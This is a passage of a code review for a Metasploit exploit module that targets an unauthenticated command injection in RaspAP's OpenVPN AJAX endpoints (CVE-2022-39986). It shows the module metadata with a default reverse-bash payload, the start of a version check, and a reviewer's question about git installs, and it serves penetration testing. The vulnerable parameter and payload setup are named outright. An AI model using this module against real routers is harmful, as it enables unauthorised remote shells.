modules/exploits/unix/http/raspap_rce.rb

```diff
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'RaspAP Unauthenticated Command Injection',
+        'Description' => %q{
+          RaspAP is feature-rich wireless router software that just works
+          on many popular Debian-based devices, including the Raspberry Pi.
+          A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+          unauthenticated attackers to execute arbitrary commands via the cfg_id
+          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+
+          Successfully tested against RaspAP 2.8.0 and 2.8.7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege BALCI <egebalci[at]pm.me>', # msf module
+          'Ismael0x00', # original PoC, analysis
+        ],
+        'References' => [
+          ['CVE', '2022-39986'],
+          ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],
+          ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']
+        ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-07-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'README.md'),
+      'method' => 'GET'
+    ) # We can read version number from README.md since it is being installed from git
```

Comment:
Is raspap _always_ installed from git? If not, is there another way to get the version?

Reply:
Yes, both the quick install script and manual installation steps use `git clone`.  There is no other documented way to install.